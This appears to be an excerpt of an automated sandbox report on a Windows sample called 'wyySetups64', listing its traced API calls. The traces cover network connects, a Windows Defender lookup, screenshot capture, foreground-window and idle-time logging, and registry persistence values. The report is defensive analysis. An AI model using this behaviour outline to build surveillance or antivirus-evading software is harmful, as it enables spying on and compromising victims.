                                                                                                                                                                                                              • connect.WS2_32(?,?,00000010), ref: 03372EAB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                                                                                                                                              • String ID: 0u
                                                                                                                                                                                                              • API String ID: 640718063-3203441087
                                                                                                                                                                                                              • Opcode ID: f66fa9e27839b0cbb8349b12178a57748b5f384c99f62f2646e925efe9a5938e
                                                                                                                                                                                                              • Instruction ID: ef57d01e2b25428a484f8eb96bf51097348a70bc5bb64f672e6554890a6a8ecb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f66fa9e27839b0cbb8349b12178a57748b5f384c99f62f2646e925efe9a5938e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF615071A40708BFD720EFA4DC85FABB7B8FF48B10F10451AF655EB290D6B5A9048B64

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 0337AD53
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0337AD73
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: OpenQueryValue
                                                                                                                                                                                                              • String ID: %s_bin$Console$Console\0$IpDatespecial
                                                                                                                                                                                                              • API String ID: 4153817207-1338088003
                                                                                                                                                                                                              • Opcode ID: 0598fbb99e90309cd2e78769d11e9a0c3faee93000c33be40081d201dc3d3563
                                                                                                                                                                                                              • Instruction ID: e9481c149d907f95ed02dcaf7ef89d6fe00c5471ab2e6c780ad15c2897143404
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0598fbb99e90309cd2e78769d11e9a0c3faee93000c33be40081d201dc3d3563
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8C1C2B5A00300ABE720EF24DCC5F6BB3A9BF94714F080569F9459B381E779E915C7A2

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,2024.12. 3), ref: 03375F66
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 03375F6E
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 03375F85
                                                                                                                                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,2024.12. 3), ref: 03375F90
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 03375F92
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03375FB9
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 03375FC6
                                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,03395328), ref: 03375FED
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 03375FF8
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 03376005
                                                                                                                                                                                                              • GetConsoleWindow.KERNEL32 ref: 0337600F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorLastMutexSleep$ConsoleHandleModuleWindow_memsetlstrcmplstrlen
                                                                                                                                                                                                              • String ID: 2024.12. 3$key$open
                                                                                                                                                                                                              • API String ID: 2922109467-4129338558
                                                                                                                                                                                                              • Opcode ID: 15a6c3dfe4fcb556d3a50f78a050bf1ee95c17ecfc1279cfb0e1f56b929fa4e8
                                                                                                                                                                                                              • Instruction ID: 7de1df75de4bc3a01dd37dc83a3497be902fd4b1baeafc8615d1eb7f9d8741a3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15a6c3dfe4fcb556d3a50f78a050bf1ee95c17ecfc1279cfb0e1f56b929fa4e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E821F672904709EFE624FB60ECC6B5B739C9B84705F14081AE604DB1C1DB79E509CBA3

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 033762CE
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 03376336
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0337635F
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03376376
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 033763B2
                                                                                                                                                                                                              • lstrcatW.KERNEL32(033A1F10,?), ref: 033763CE
                                                                                                                                                                                                              • lstrcatW.KERNEL32(033A1F10,0339535C), ref: 033763DA
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 033763E3
                                                                                                                                                                                                              • lstrlenW.KERNEL32(033A1F10,?,7AA29978,00000AD4,00000000,75BF73E0), ref: 03376427
                                                                                                                                                                                                              • lstrcatW.KERNEL32(033A1F10,033953D4,?,7AA29978,00000AD4,00000000,75BF73E0), ref: 0337643B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                                                                                                                                                                                              • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                                                                                                                                              • API String ID: 1671694837-1583895642
                                                                                                                                                                                                              • Opcode ID: e6d940a2b072719d9ecb960cede27ec80e7d494532724b42ee02d4f9537d85d5
                                                                                                                                                                                                              • Instruction ID: 1aa67f67ede612b713ee5cac5a2adcc9e0c03d691f36a762003262493953658f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6d940a2b072719d9ecb960cede27ec80e7d494532724b42ee02d4f9537d85d5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C4184F1A40668AFDB34DB54CC91FEEB7B8AB48705F0442C9F309A7182D6759A80CF64

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(ntdll.dll,75BF73E0,?,?,?,03375611,0000035E,000002FA), ref: 0337749C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 033774B2
                                                                                                                                                                                                              • swprintf.LIBCMT ref: 033774EF
                                                                                                                                                                                                                • Part of subcall function 03377410: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03377523), ref: 0337743D
                                                                                                                                                                                                                • Part of subcall function 03377410: GetProcAddress.KERNEL32(00000000), ref: 03377444
                                                                                                                                                                                                                • Part of subcall function 03377410: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03377523), ref: 03377452
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,000002FA), ref: 03377547
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(000002FA,ProductName,00000000,00000001,00000000,?), ref: 03377563
                                                                                                                                                                                                              • RegCloseKey.KERNEL32(000002FA), ref: 03377586
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,03375611,0000035E,000002FA), ref: 03377598
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressLibraryProc$CloseFreeHandleInfoLoadModuleNativeOpenQuerySystemValueswprintf
                                                                                                                                                                                                              • String ID: %d.%d.%d$ProductName$RtlGetNtVersionNumbers$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
                                                                                                                                                                                                              • API String ID: 2158625971-3190923360
                                                                                                                                                                                                              • Opcode ID: f3c2e8577a981eaf7c4b0c20984a435a68fa3bc06729bd8a609c9f63802d9667
                                                                                                                                                                                                              • Instruction ID: de6feac0fbf6caadf2f3cd16d4a38c2a2c0734163a87abff1275fa6fada4bc91
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3c2e8577a981eaf7c4b0c20984a435a68fa3bc06729bd8a609c9f63802d9667
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E531B875A40308BFEB24EBA4CCC5EBF777CDB48750F140519BA06E6145E674DA04C760

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,?,7AA29978,?,00000000,?), ref: 0337C09E
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0337C0AA
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0337C0BF
                                                                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0337C0D5
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0339FB64), ref: 0337C113
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0339FB64), ref: 0337C124
                                                                                                                                                                                                                • Part of subcall function 03379DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03379E04
                                                                                                                                                                                                                • Part of subcall function 03379DE0: GdipDisposeImage.GDIPLUS(?), ref: 03379E18
                                                                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0337C14C
                                                                                                                                                                                                                • Part of subcall function 0337A460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0337A48D
                                                                                                                                                                                                                • Part of subcall function 0337A460: _free.LIBCMT ref: 0337A503
                                                                                                                                                                                                              • GetHGlobalFromStream.OLE32(?,?), ref: 0337C16D
                                                                                                                                                                                                              • GlobalLock.KERNEL32(?), ref: 0337C177
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0337C18F
                                                                                                                                                                                                                • Part of subcall function 03379BA0: DeleteObject.GDI32(?), ref: 03379BD2
                                                                                                                                                                                                                • Part of subcall function 03379BA0: EnterCriticalSection.KERNEL32(0339FB64,?,?,?,03379B7B), ref: 03379BE3
                                                                                                                                                                                                                • Part of subcall function 03379BA0: EnterCriticalSection.KERNEL32(0339FB64,?,?,?,03379B7B), ref: 03379BF8
                                                                                                                                                                                                                • Part of subcall function 03379BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,03379B7B), ref: 03379C04
                                                                                                                                                                                                                • Part of subcall function 03379BA0: LeaveCriticalSection.KERNEL32(0339FB64,?,?,?,03379B7B), ref: 03379C15
                                                                                                                                                                                                                • Part of subcall function 03379BA0: LeaveCriticalSection.KERNEL32(0339FB64,?,?,?,03379B7B), ref: 03379C1C
                                                                                                                                                                                                              • GlobalSize.KERNEL32(00000000), ref: 0337C1A5
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(?), ref: 0337C221
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0337C249
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1483550337-0
                                                                                                                                                                                                              • Opcode ID: 9fd20989ca3105c90db4ab1fc6461bf2a0bd5c89014fecbe6524eb8f415621ac
                                                                                                                                                                                                              • Instruction ID: ffe291feb5c3749f767a62de592beac143494ea26daaf93d9d83a3ef9f3ea491
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9fd20989ca3105c90db4ab1fc6461bf2a0bd5c89014fecbe6524eb8f415621ac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 236117B5D0021CEFDB20EFA8D8C4A9EBBB8FF49710F20452AE515EB241DB359905CB90

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 033764C2
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 033764E2
                                                                                                                                                                                                              • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 03376524
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03376560
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337658E
                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,75BF73E0), ref: 033765BA
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 033765C3
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 033765D5
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000000,00000AD4,75BF73E0), ref: 03376625
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 03376635
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Software\Tencent\Plugin\VAS, xrefs: 033764D8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                                                                                                                                                                                              • String ID: Software\Tencent\Plugin\VAS
                                                                                                                                                                                                              • API String ID: 2921034913-3343197220
                                                                                                                                                                                                              • Opcode ID: f5bc8d0c5031981ab59063607eb23cd7c7d280b0628c8c11600ba333a5d29188
                                                                                                                                                                                                              • Instruction ID: b4a10a192fa2b67f3bfa2cfa81edb5c071ebedf70a38503aa25dd030846fae9c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5bc8d0c5031981ab59063607eb23cd7c7d280b0628c8c11600ba333a5d29188
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E4195F5E40218ABDB34EB50CDC5FEAB37CEB44700F404599E709B6141EA75AA858B64
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0337A48D
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 0337A4D1
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337A503
                                                                                                                                                                                                              • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 0337A522
                                                                                                                                                                                                              • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 0337A594
                                                                                                                                                                                                              • GdipDisposeImage.GDIPLUS(00000000), ref: 0337A59F
                                                                                                                                                                                                              • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0337A5C5
                                                                                                                                                                                                              • GdipDisposeImage.GDIPLUS(00000000), ref: 0337A5DD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                                                                                                                                                                                              • String ID: &
                                                                                                                                                                                                              • API String ID: 2794124522-3042966939
                                                                                                                                                                                                              • Opcode ID: 96d8dbe43a28239c9b4636d2528a9cccb392e103af78bdcfce384312dce09f3b
                                                                                                                                                                                                              • Instruction ID: 4141a957d2420e0fb12c3eac67c5dc986082d7f5bfa6c3ce583fc8467c7b7f67
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96d8dbe43a28239c9b4636d2528a9cccb392e103af78bdcfce384312dce09f3b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F55153B5E00219AFDB24DFA4D8C4EEFB7B8AF48750F048159E905AB350D739A945CBE0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 00BD5382
                                                                                                                                                                                                              • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 00BD5392
                                                                                                                                                                                                              • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,00BEC6E0,000012A0), ref: 00BD53B0
                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 00BD53BB
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 00BD540F
                                                                                                                                                                                                              • GetExitCodeProcess.KERNEL32(00000000,?), ref: 00BD541B
                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 00BD5434
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                               • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                               • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                               • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                               • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                               • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                                                                                                                              • String ID: IpDates_info$SOFTWARE
                                                                                                                                                                                                              • API String ID: 864241144-2243437601
                                                                                                                                                                                                              • Opcode ID: e5dc7de447577991d2e973742e8b59c222dac3d1bc7300c7d12f0d8b5fb707f5
                                                                                                                                                                                                              • Instruction ID: 8af243351a8f894bb4b23de5e30fd21d4d8c10901cde0bc200c296e1a2b97805
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5dc7de447577991d2e973742e8b59c222dac3d1bc7300c7d12f0d8b5fb707f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2941FA316486819FD3309B248C85A7ABBE5EB51354F5804CAE5838B352FB70D806C756
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 00BD5382
                                                                                                                                                                                                              • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 00BD5392
                                                                                                                                                                                                              • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,00BEC6E0,000012A0), ref: 00BD53B0
                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 00BD53BB
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 00BD540F
                                                                                                                                                                                                              • GetExitCodeProcess.KERNEL32(00000000,?), ref: 00BD541B
                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 00BD5434
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                               • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                               • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                               • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                               • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                               • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                                                                                                                              • String ID: IpDates_info$SOFTWARE
                                                                                                                                                                                                              • API String ID: 864241144-2243437601
                                                                                                                                                                                                              • Opcode ID: c48ec0aeaf29484f45f0e137261d2459d9e3051aed8d2651eb78f266e64a779a
                                                                                                                                                                                                              • Instruction ID: 7447e777b51be91021da5589da1bc20f673e70ed6fe9e188fd62c6a8a45a725f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c48ec0aeaf29484f45f0e137261d2459d9e3051aed8d2651eb78f266e64a779a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD31C5302887C19FD730CB308859B7ABBE5EB54354F9804CAF1868B352E7B0D846C766
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,033912F8,7AA29978,00000001,00000000,00000000), ref: 0337CAB1
                                                                                                                                                                                                              • RegQueryInfoKeyW.ADVAPI32(033912F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0337CAE0
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337CB44
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337CB53
                                                                                                                                                                                                              • RegEnumValueW.KERNEL32(033912F8,?,00000000,?,00000000,?,00000000,?), ref: 0337CB72
                                                                                                                                                                                                                • Part of subcall function 0337F707: _malloc.LIBCMT ref: 0337F721
                                                                                                                                                                                                                • Part of subcall function 0337F707: std::exception::exception.LIBCMT ref: 0337F756
                                                                                                                                                                                                                • Part of subcall function 0337F707: std::exception::exception.LIBCMT ref: 0337F770
                                                                                                                                                                                                                • Part of subcall function 0337F707: __CxxThrowException@8.LIBCMT ref: 0337F781
                                                                                                                                                                                                              • RegCloseKey.KERNEL32(033912F8,?,?,?,?,?,?,?,?,?,?,?,00000000,033912F8,000000FF), ref: 0337CC83
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                                                                                                                                                                                              • String ID: Console\0
                                                                                                                                                                                                              • API String ID: 1348767993-1253790388
                                                                                                                                                                                                              • Opcode ID: ed7c8f06f959d1a23a678677d1411ffbbf91db82626b0c377bffbbf486ed21e1
                                                                                                                                                                                                              • Instruction ID: e46f8e5c7793d987da436bbb537ca3134d41751e9d0213b1956d90875eb45484
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed7c8f06f959d1a23a678677d1411ffbbf91db82626b0c377bffbbf486ed21e1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43611DB5E00219AFDB14DFA8D8C0EAEB7B8FB48310F14466AF915EB345D7359901CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0337F707: _malloc.LIBCMT ref: 0337F721
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337BB21
                                                                                                                                                                                                              • GetLastInputInfo.USER32(?), ref: 0337BB37
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0337BB3D
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337BB66
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0337BB6F
                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 0337BB83
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                                                                                                                                                                                              • String ID: %d min
                                                                                                                                                                                                              • API String ID: 3754759880-1947832151
                                                                                                                                                                                                              • Opcode ID: 79906b25d9fe24be0d5ade3ab6405e834985998073a810c3a7010e8b3745bc3e
                                                                                                                                                                                                              • Instruction ID: e0d0148edb0818f28985bd2022da5141f22ec87ab83e3ba49cf71e73e5e1ab58
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79906b25d9fe24be0d5ade3ab6405e834985998073a810c3a7010e8b3745bc3e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF41B2B5D00218AFCB10EFA4CCC4E9FBBB8EF48700F088155F9099B255D6789A00CBE1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(7AA29978,00000000,00000000,75BF73E0,?,00000000,033910DB,000000FF,?,03376AB3,00000000), ref: 03376938
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,033910DB,000000FF,?,03376AB3,00000000), ref: 03376947
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,033910DB,000000FF,?,03376AB3,00000000), ref: 03376960
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,033910DB,000000FF,?,03376AB3,00000000), ref: 0337696B
                                                                                                                                                                                                              • SysStringLen.OLEAUT32(00000000), ref: 033769BE
                                                                                                                                                                                                              • SysStringLen.OLEAUT32(00000000), ref: 033769CC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,033910DB,000000FF), ref: 03376A2E
